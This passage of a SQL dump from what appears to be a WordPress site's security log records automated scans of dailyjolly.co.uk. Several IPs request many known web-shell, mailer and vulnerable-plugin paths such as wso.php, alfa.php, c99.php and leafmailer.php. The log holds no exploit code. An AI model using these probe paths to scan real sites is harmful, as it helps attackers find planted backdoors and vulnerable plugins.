,54961967,'',0,1673950790.9970,55,'IieWT1zAd53KHoyqaOvNFRjZ','','19|0|0|0|dailyjolly.co.uk/lufix.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.0418,55,'kVXzuGTtWy0HMxLJQv9NAnmb','','19|0|0|0|dailyjolly.co.uk/media-admin.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.0802,55,'0dqZT9XlyUNLcDVsg1RHjK54','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/xm.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.0980,55,'PRN1HJ5KwkyM4If3uOYBbvAq','','19|0|0|0|dailyjolly.co.uk/wp-includes/images/wp-blog.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.1563,55,'qBd8jG3vYSQJcCxOUuITk12V','','19|0|0|0|dailyjolly.co.uk/style.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.2870,55,'hLKJQ1glZjPdqDEyCoI75RHx','','19|0|0|0|dailyjolly.co.uk/w.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.3261,55,'CP3lRBDkNQXzfg9cIyuh6ZJY','','19|0|0|0|dailyjolly.co.uk/vuln.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.3261,55,'Nyu69eFq0tbPSZ7KhdAlvIgU','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.5518,55,'LJKemF8WVan213r7QCbIxOoq','','19|0|0|0|dailyjolly.co.uk/p.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.5651,55,'UPEcWszTgSt2OmCukZFRfprh','','19|0|0|0|dailyjolly.co.uk/shell20220621.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.6498,100,'3dlHYEn2pkKW6zfuPixrSNb9','','13|0|0|0|dailyjolly.co.uk/error.php',0,13,0),('3.70.167.47',54961967,'',0,1673950791.6669,55,'4uGB5CsLyHpoa0MzqJg3Kicr','','19|0|0|0|dailyjolly.co.uk/lufix.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.9406,55,'Ufru8bVGtWpa79RBqI3lwxyF','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.9652,55,'SRq12UObgaHjpx9mTovEi8fd','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.9696,55,'7EOGl6XyeizUVFtq1Jo8sKfR','','19|0|0|0|dailyjolly.co.uk/mt/pekok.php',0,19,0),('3.70.167.47',54961967,'',0,1673950791.9937,55,'BLRye47i2IwgYarhJ0oAKE9c','','19|0|0|0|dailyjolly.co.uk/mini.php',0,19,0),('3.70.167.47',54961967,'',0,1673950792.0687,55,'BHhuGbyCI1UxOEAf9wXnRzDY','','19|0|0|0|dailyjolly.co.uk/media-admin.php',0,19,0),('3.70.167.47',54961967,'',0,1673950792.2470,55,'oiu6y1OHpnStdDCF0wX3RKUm','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/xm.php',0,19,0),('3.70.167.47',54961967,'',0,1673950792.3845,55,'8MKtsc50eo2uZgWdnB7aLjyI','','19|0|0|0|dailyjolly.co.uk/vuln.php',0,19,0),('3.70.167.47',54961967,'',0,1673950792.4375,55,'VGtB0XQSMTY86fvZhCHdx5w3','','19|0|0|0|dailyjolly.co.uk/new-index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950793.2140,55,'OFsX7AjVBwhNUnCcD1QYuorE','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/wp-atom.php',0,19,0),('3.70.167.47',54961967,'',0,1673950794.2505,55,'7lsJDuRAX6TrndMUYa1et3op','','19|0|0|0|dailyjolly.co.uk/style.php',0,19,0),('3.70.167.47',54961967,'',0,1673950794.6751,55,'LMweR1fD9kYxiBE6JIUoyHSN','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/wp.php',0,19,0),('3.70.167.47',54961967,'',0,1673950794.7704,55,'O5m3Y2DTjSeukXot8fdlUKBH','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950794.8166,55,'aLEm6AqBY7WI9goJKeR4uNpx','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950794.8376,55,'z4NpbtOi9KM0TYluJCsqBy2f','','19|0|0|0|dailyjolly.co.uk/b.php',0,19,0),('3.70.167.47',54961967,'',0,1673950795.4210,55,'WsKdgknu5F1TOZSo6yMzjG2v','','19|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('3.70.167.47',54961967,'',0,1673950795.4217,55,'7E0aFMR8qSjHDXzfkbdgmpLU','','19|0|0|0|dailyjolly.co.uk/new-index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950795.4230,55,'a4ZrSlmkYtjxzHNRi3TCd0b7','','19|0|0|0|dailyjolly.co.uk/shell20220621.php',0,19,0),('3.70.167.47',54961967,'',0,1673950795.6123,55,'QFDSMULXilfP8Wa6uTVs7yo3','','19|0|0|0|dailyjolly.co.uk/wp-includes/images/wp-blog.php',0,19,0),('3.70.167.47',54961967,'',0,1673950795.6347,55,'EekUxDB0rpg21F4bfNOGRt8y','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/wp-atom.php',0,19,0),('3.70.167.47',54961967,'',0,1673950795.6977,55,'LKReWYGpICEh5O8bydTXHkja','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950796.6893,100,'9AutmRyVT2Gbhc5IwZpn4ga8','','13|0|0|0|dailyjolly.co.uk/error.php',0,13,0),('3.70.167.47',54961967,'',0,1673950796.7404,55,'zZwL2Ulp53DTYXnJe91mPN4k','','19|0|0|0|dailyjolly.co.uk/mt/pekok.php',0,19,0),('3.70.167.47',54961967,'',0,1673950796.7999,55,'LYyhfUgo8bv5rsJ3HIktZj1x','','19|0|0|0|dailyjolly.co.uk/p.php',0,19,0),('3.70.167.47',54961967,'',0,1673950796.9613,55,'npdh7aEg5kxSX493fFNG0Hjc','','19|0|0|0|dailyjolly.co.uk/w.php',0,19,0),('3.70.167.47',54961967,'',0,1673950797.1402,55,'yOfGgIZNmot8unMVC09xK7RF','','19|0|0|0|dailyjolly.co.uk/mini.php',0,19,0),('3.70.167.47',54961967,'',0,1673950797.2638,55,'Qy8gs7xJ5qKj2TVlPHkaMvYN','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950797.6533,55,'navKDMkcHPsdB37i16yxVFoz','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/wp.php',0,19,0),('3.70.167.47',54961967,'',0,1673950797.9062,55,'Q6XZnGAk1gIq47xtoFSR82Js','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950798.0412,55,'m7JG4Tg5SfMnFotQ8V6PDuL2','','19|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('3.70.167.47',54961967,'',0,1673950807.7066,55,'l3wZfR7gn8vWuyidcF4CUJBP','','19|0|0|0|dailyjolly.co.uk/indeeex.php',0,19,0),('3.70.167.47',54961967,'',0,1673950807.7629,55,'S2J3L1Gcxn6yuz4vBd0T57pV','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('3.70.167.47',54961967,'',0,1673950807.7658,55,'8WqV6YlATRiJB4tcmCS2DQpu','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('3.70.167.47',54961967,'',0,1673950808.4649,55,'5uP4vm0gXAMDH9jTe8yGtLx2','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('3.70.167.47',54961967,'',0,1673950808.5088,55,'LopYstWu28Ur6XOjNA0IzBGJ','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('3.70.167.47',54961967,'',0,1673950808.5349,55,'j3zc8nZBbIp2URGdEqLC6vo7','','19|0|0|0|dailyjolly.co.uk/indeeex.php',0,19,0),('3.70.167.47',54961967,'',0,1673950817.1393,55,'mA3US8jWw6oPcFOIkXnfV2E1','','19|0|0|0|dailyjolly.co.uk/e.php',0,19,0),('3.70.167.47',54961967,'',0,1673950817.1393,55,'a9mNTA6dcbIJ1X2E8ZlYsPnO','','19|0|0|0|dailyjolly.co.uk/images/vuln.php',0,19,0),('3.70.167.47',54961967,'',0,1673950817.1462,55,'RIOE9Mxt2JWB68wiQnupoCDl','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('3.70.167.47',54961967,'',0,1673950817.3162,55,'XfIzL6ubmx4K9CqD1FEwPkVO','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950817.6384,55,'LvXe9uKQJkw45BUMbt8cD3sa','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('3.70.167.47',54961967,'',0,1673950817.6967,55,'lS0GJP9zesLEZAgbBuIwOX6F','','19|0|0|0|dailyjolly.co.uk/images/vuln.php',0,19,0),('3.70.167.47',54961967,'',0,1673950817.7769,55,'2lYPRyhQ3ZciXrog857UufVt','','19|0|0|0|dailyjolly.co.uk/e.php',0,19,0),('3.70.167.47',54961967,'',0,1673950817.7839,55,'By1Tpg6FILDHusdNvqOQ2aVA','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950820.0791,55,'IHYsou68Qnt7xwc0eTmvAqP2','','19|0|0|0|dailyjolly.co.uk/wp-content/radio.php',0,19,0),('3.70.167.47',54961967,'',0,1673950820.6694,55,'tpiae4vdwOVI3nLlBrR8UsJS','','19|0|0|0|dailyjolly.co.uk/wp-content/radio.php',0,19,0),('3.70.167.47',54961967,'',0,1673950829.1464,55,'2DAfPyRcU7tgq1FK9kLTpjQi','','19|0|0|0|dailyjolly.co.uk/wp-content/about.php',0,19,0),('3.70.167.47',54961967,'',0,1673950829.5312,55,'bUdT2Synz41C9F6Boc3VOxjD','','19|0|0|0|dailyjolly.co.uk/wp-content/about.php',0,19,0),('3.70.167.47',54961967,'',0,1673950829.8205,55,'wDla9L5bgfX4n0HWTIckUECh','','19|0|0|0|dailyjolly.co.uk/new.php',0,19,0),('3.70.167.47',54961967,'',0,1673950829.8507,55,'nECfXWB4NzgxMYUtmwqvZ8sV','','19|0|0|0|dailyjolly.co.uk/wp-includes/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950829.8507,55,'tA3o6MxN28phig0n9lzSXwuL','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/2021/12/up.php',0,19,0),('3.70.167.47',54961967,'',0,1673950829.9072,55,'pREaFlUYSZkL8xWduNXKo1cA','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('3.70.167.47',54961967,'',0,1673950829.9352,55,'pz5cnDxhF4V1UbdNlIXogGa2','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/fighter/fk.php',0,19,0),('3.70.167.47',54961967,'',0,1673950829.9459,100,'R6vMP74wo5tc2bLG3fXJYsAQ','','13|0|0|0|dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('3.70.167.47',54961967,'',0,1673950830.0066,55,'IJwFY9qxLci2DyR3G5dUKs7N','','19|0|0|0|dailyjolly.co.uk/hello.php',0,19,0),('3.70.167.47',54961967,'',0,1673950830.2849,55,'VbhvSjPW8z6ckoYgxBdnD5re','','19|0|0|0|dailyjolly.co.uk/wp-includes/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950830.2958,55,'NzbY84hjKM3sRBA15krdx6of','','19|0|0|0|dailyjolly.co.uk/new.php',0,19,0),('3.70.167.47',54961967,'',0,1673950830.3030,100,'SOyhP0DZ1KFI8QpbmqW53kua','','13|0|0|0|dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('3.70.167.47',54961967,'',0,1673950830.3089,55,'jXweJdEPgQxabmNVo40kcrz7','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('3.70.167.47',54961967,'',0,1673950830.3279,55,'gfh7NISMGu8ydk34msAvePzT','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/2021/12/up.php',0,19,0),('3.70.167.47',54961967,'',0,1673950830.3884,55,'6SEP5Dy2R0L9b4xWIB3mpZf7','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/fighter/fk.php',0,19,0),('3.70.167.47',54961967,'',0,1673950830.4103,55,'OfeqHoUasTu8KRywFJd0XBbn','','19|0|0|0|dailyjolly.co.uk/hello.php',0,19,0),('109.248.175.119',1845014391,'',0,1673952301.4439,55,'H6WbYoFXhCxrSL9OPejdtlM1','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php',0,19,0),('20.244.36.78',351544398,'',0,1673955346.6413,55,'Z1I7l84erXwLSb5jAyfTFo0N','','19|0|0|0|www.dailyjolly.co.uk/shell4.php',0,19,0),('20.244.36.78',351544398,'',0,1673955347.7591,55,'z5HCyYKcOlUEJ8u7PDmiAvbx','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('20.244.36.78',351544398,'',0,1673955348.8849,55,'7QXt3dTVmroxFKPWzauSOvM2','','19|0|0|0|www.dailyjolly.co.uk/ru.php',0,19,0),('20.244.36.78',351544398,'',0,1673955349.9770,55,'MSTyiVaBo5N1x6A0m93IKtWR','','19|0|0|0|www.dailyjolly.co.uk/if.php',0,19,0),('20.244.36.78',351544398,'',0,1673955351.1017,55,'kyHEwGir1NjxnvSPXgMDpBa2','','19|0|0|0|www.dailyjolly.co.uk/vuln.php',0,19,0),('20.244.36.78',351544398,'',0,1673955351.1570,10,'kyHEwGir1NjxnvSPXgMDpBa2','','707|0|0|0|www.dailyjolly.co.uk/vuln.php',0,707,0),('20.244.36.78',351544398,'',0,1673955352.2331,55,'QtX6rs5z8xZnBT3ASmgH2iK1','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('20.244.36.78',351544398,'',0,1673955353.3469,55,'RNlvKBMCnhyGZQdD5JerT6uV','','19|0|0|0|www.dailyjolly.co.uk/skipper.php',0,19,0),('20.244.36.78',351544398,'',0,1673955354.4785,55,'2sv8OBVy7x04DEAtmiKYr3Mb','','19|0|0|0|www.dailyjolly.co.uk/skippershell.php',0,19,0),('20.244.36.78',351544398,'',0,1673955355.5910,55,'fEBpqIUh4ksO3XQm9yZbx08P','','19|0|0|0|www.dailyjolly.co.uk/tttt.php',0,19,0),('20.244.36.78',351544398,'',0,1673955356.6818,55,'adrXNeUSQGB431ToIwglDP9m','','19|0|0|0|www.dailyjolly.co.uk/tshop.php',0,19,0),('20.244.36.78',351544398,'',0,1673955357.8221,55,'bncJ5gYMQVdHaUP2ZG3sWX8w','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('20.244.36.78',351544398,'',0,1673955358.8969,55,'s03q2doz5MumxjF1TE4AVpiR','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('20.244.36.78',351544398,'',0,1673955360.0079,55,'o9l0eihWpnqByFrGPuwfQZD3','','19|0|0|0|www.dailyjolly.co.uk/inje3ctor.php',0,19,0),('20.244.36.78',351544398,'',0,1673955361.1389,55,'4fNP6FR9SEnKxpw7WLl2CtuJ','','19|0|0|0|www.dailyjolly.co.uk/saudi.php',0,19,0),('20.244.36.78',351544398,'',0,1673955362.2380,55,'N56ITfgeQJD9ujE2HPYazrLS','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('20.244.36.78',351544398,'',0,1673955363.3445,55,'c4V2iqb36ZQUrODAnxLJ8Mm9','','19|0|0|0|www.dailyjolly.co.uk/alfashell.php',0,19,0),('20.244.36.78',351544398,'',0,1673955364.4516,55,'pPOeV7g3FivoGzIqdEkAW2hR','','19|0|0|0|www.dailyjolly.co.uk/my_alfa.php',0,19,0),('20.244.36.78',351544398,'',0,1673955365.5381,55,'04AvByYXlrCqDh82tpQnGJe1','','19|0|0|0|www.dailyjolly.co.uk/uploader.php',0,19,0),('20.244.36.78',351544398,'',0,1673955366.6608,55,'3h9IVAZybUCOnK1irj5lGQ72','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('20.244.36.78',351544398,'',0,1673955367.7746,55,'I0HQuGFd2rWL8epiNg4t6lZf','','19|0|0|0|www.dailyjolly.co.uk/hacked.php',0,19,0),('20.244.36.78',351544398,'',0,1673955368.8937,55,'2ONc5pjasHqXEbDhFA9MG07W','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('20.244.36.78',351544398,'',0,1673955369.9779,55,'PJ9i5OYyfV67gNA8ozMecUKs','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('20.244.36.78',351544398,'',0,1673955371.1193,55,'SaFqP0Rdj6NBV1pOEGWHKLnu','','19|0|0|0|www.dailyjolly.co.uk/Navir.php',0,19,0),('20.244.36.78',351544398,'',0,1673955372.2109,55,'fWBJpyUrCI0xhLK9QgwDne7S','','19|0|0|0|www.dailyjolly.co.uk/cmd13.php',0,19,0),('20.244.36.78',351544398,'',0,1673955373.3242,55,'24KFrSAuRjbDqWfzHN9caXvt','','19|0|0|0|www.dailyjolly.co.uk/inc20k1.php',0,19,0),('20.244.36.78',351544398,'',0,1673955374.4355,55,'4iUROPd0DSxCho76ZGQyqBgT','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.244.36.78',351544398,'',0,1673955375.5467,55,'IpVxgvKdUGs8zlia1w6qy4NW','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('20.244.36.78',351544398,'',0,1673955376.6220,55,'WoD2d9eKvzkqLYxOJ3t7S0IG','','19|0|0|0|www.dailyjolly.co.uk/swm.php',0,19,0),('20.244.36.78',351544398,'',0,1673955377.7390,55,'zqrFt4fMB8w6HRWxvOuJycpX','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.244.36.78',351544398,'',0,1673955378.9043,55,'TgdY7ksFXGiZPEmf52nBQCah','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('20.244.36.78',351544398,'',0,1673955380.0193,55,'Diz2EY1BtqW583xrS6ReQLOg','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('20.244.36.78',351544398,'',0,1673955381.1394,55,'IgjxTWDelptU7f8M1NE0uBHn','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('20.244.36.78',351544398,'',0,1673955382.2582,55,'pc4ebArZRNn8yg2D1xCHPWsQ','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.244.36.78',351544398,'',0,1673955384.0505,55,'B8PUORmgZIHWMo9tkA0bGfad','','19|0|0|0|www.dailyjolly.co.uk/edit-form.php',0,19,0),('20.244.36.78',351544398,'',0,1673955385.1702,55,'98HsQLDNrCfzAlOVghKE67Wj','','19|0|0|0|www.dailyjolly.co.uk/LEAF.php',0,19,0),('20.244.36.78',351544398,'',0,1673955386.2571,55,'gw27caqsuzNlkxBb0mDfTMnA','','19|0|0|0|www.dailyjolly.co.uk/leafmailer.php',0,19,0),('20.244.36.78',351544398,'',0,1673955387.3486,55,'NExteqQjWKFdYfrk1hAuRTiM','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.244.36.78',351544398,'',0,1673955388.5048,55,'xyLMKkiHb1detN5RGmg9PXEn','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('20.244.36.78',351544398,'',0,1673955389.6477,55,'2EpwJj1KFrCW3xdLGXH7abhZ','','19|0|0|0|www.dailyjolly.co.uk/Leaf.php',0,19,0),('20.244.36.78',351544398,'',0,1673955390.7384,55,'92WUdEw1B7IhvkrM5ZgAfNHx','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.244.36.78',351544398,'',0,1673955391.8312,55,'TqCm5bNt69OngyPAhDJV3Sv8','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.244.36.78',351544398,'',0,1673955392.9376,55,'AxKNdO1Wk4tgsUouX8jJLyhZ','','19|0|0|0|www.dailyjolly.co.uk/srx.php',0,19,0),('20.244.36.78',351544398,'',0,1673955394.0346,55,'0TMcbY4qej2l8uzB6fpyiESZ','','19|0|0|0|www.dailyjolly.co.uk/1337.php',0,19,0),('20.244.36.78',351544398,'',0,1673955395.2132,55,'fqLzkbiIR0deGrl9XwpxDFga','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('20.244.36.78',351544398,'',0,1673955396.3008,55,'z7BdbwXDNxqmaQFkcgLyOGC2','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('20.244.36.78',351544398,'',0,1673955397.4166,55,'jlwNkYVJ2h8Age6GcboUdpSQ','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.244.36.78',351544398,'',0,1673955398.5354,55,'RLh75TbrtDwVe4IPKN2cgyqC','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('20.244.36.78',351544398,'',0,1673955399.6843,55,'iEg3AjX9la5u2pkVULY1CvbP','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('20.244.36.78',351544398,'',0,1673955400.9391,55,'3MX1IZyE8t6b9orNhOgqiAeQ','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('20.244.36.78',351544398,'',0,1673955402.0668,55,'V5UnPdzlDTmE3RNqQbXFfBeG','','19|0|0|0|www.dailyjolly.co.uk/gaza.php',0,19,0),('20.244.36.78',351544398,'',0,1673955403.2057,55,'ByW96nAuQ4COoF8L2ZVvpiHt','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('20.244.36.78',351544398,'',0,1673955404.2989,55,'qB6HwoOXNSACe97aUvYVRJpi','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('20.244.36.78',351544398,'',0,1673955405.3835,55,'cRoqlHfumn5DxrhIgJ1ezFj2','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('20.244.36.78',351544398,'',0,1673955406.4825,55,'sGmlVqhCcebZyQIU2BAY97XH','','19|0|0|0|www.dailyjolly.co.uk/wso1.php',0,19,0),('20.244.36.78',351544398,'',0,1673955407.5711,55,'oU0B8PtNcXmLRCeSkrJsIVvY','','19|0|0|0|www.dailyjolly.co.uk/bb.php',0,19,0),('20.244.36.78',351544398,'',0,1673955408.6572,55,'LHY0ztsoRfb4arJwxBSihgNv','','19|0|0|0|www.dailyjolly.co.uk/Lux.php',0,19,0),('20.244.36.78',351544398,'',0,1673955409.8249,55,'Yg7pBM2uVW0ZHNf4GdazOKhb','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('83.240.221.24',1408294168,'',0,1673962460.5199,55,'ExpuATy9rt6wnzPsV0o1LC7d','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-login.php',0,19,0),('83.240.221.24',1408294168,'',0,1673962460.9932,55,'TmNbDUgkyxFe4WJGc3OC5SYQ','','19|0|0|0|dailyjolly.co.uk/blog/wp-login.php',0,19,0),('83.240.221.24',1408294168,'',0,1673962461.3928,55,'O5hejSJZmtL3BUzfMKC9n1pE','','19|0|0|0|dailyjolly.co.uk/wp/wp-login.php',0,19,0),('123.30.50.68',2065576516,'',0,1673963691.9577,55,'pQkuCtmI2fVMnBi9AhUXDvP4','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',0,19,0),('123.30.50.68',2065576516,'',0,1673963695.9940,55,'8fZnmc1JD20wCx7OLgq4hejX','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/versions.php',0,19,0),('123.30.50.68',2065576516,'',0,1673963697.4081,55,'DIY2HeQb5JxvRzMrKuWmpjZ3','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/assets/load.php',0,19,0),('123.30.50.68',2065576516,'',0,1673963698.6207,55,'Paq4oC09SkpfVbhJQDxdvMlt','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/walfs/index.php',0,19,0),('123.30.50.68',2065576516,'',0,1673963702.0143,55,'HaLkmj8T6XECJ5KdcZygQ0P3','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/load.php',0,19,0),('123.30.50.68',2065576516,'',0,1673963702.0425,10,'HaLkmj8T6XECJ5KdcZygQ0P3','','707|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/load.php',0,707,0),('123.30.50.68',2065576516,'',0,1673963703.4590,55,'2UHk6ErI4cDMSWO3CQJfsRdi','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/thickbox/themes.php',0,19,0),('172.174.224.29',2897141789,'',0,1673991590.8124,55,'rADVtepUKECW21hGRi9uxPcF','','19|0|0|0|www.dailyjolly.co.uk/installation/index.php',0,19,0),('109.248.175.119',1845014391,'',0,1673994560.5214,55,'u8nLripTZoyKtBYUd3fF0avH','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997074.4111,55,'nPpBwGciTkCrQZo1Mq7HA5UJ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/modules.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997077.9680,55,'aPhxgLIiZ51Fq6YmCbfNsVuH','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997081.5096,55,'YTpHiUNe2IVgPxmdAMk4SJLO','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997084.9299,55,'szJUb1LB5GdYcKoNpjiV6f3h','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997087.0681,55,'jMZcDVetwSh95RuOB0KrbLTl','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997087.0913,10,'jMZcDVetwSh95RuOB0KrbLTl','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,707,0),('217.160.238.12',3651202572,'',0,1673997090.2071,100,'vkn7iSefJNlKsyr8HoI0Ox2w','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('217.160.238.12',3651202572,'',0,1673997096.1811,55,'YGUCbSO432TfgIaoErxBLeNy','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/shapes.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997100.0663,55,'NkIbVARDgsX1MxELm6B78cul','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997101.4769,55,'y6hZOkTzWHCXlvsxDBwuoqm8','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997107.0536,55,'AtS8aXRdp9CjEzJy2uDLTObg','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997109.0035,55,'MnzXvRpKdY6orguA2wfP7baC','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997115.1826,55,'3FrAWNhcV1tnlGgwsHjMUyCd','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997118.2770,55,'bGojHQdsZu9P6gIy7a4hOqDF','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997120.7168,55,'0tbXxdkligDUYQj5svoSGqH4','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997123.4552,55,'lyvgsaD1rUGYjCF5H8VXpWbO','','19|0|0|0|www.dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997126.0211,55,'h8SGL7T4FbyaBVsEZO1IQzCi','','19|0|0|0|www.dailyjolly.co.uk/upel.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997127.8737,55,'zoqBM7paQu8Pb0YWfnLCjOUt','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997130.8722,55,'WrJjPSqzoZIpAnEuaTyfsGFL','','19|0|0|0|www.dailyjolly.co.uk/098.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997132.4458,55,'edvEtg4RUl0u8KcpWQiaF2Bq','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997135.2728,55,'PeFikg5qOEoVMA4rK27c0hZY','','19|0|0|0|www.dailyjolly.co.uk/new_license.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997137.4507,55,'LRgXUMV5t3vQeHSsrWAbdy6l','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997140.2263,55,'MLOUp6yJsgDm0PZt5e4njdo1','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997142.3611,55,'fEzwSKykpd5hiojtCAJWBxUD','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0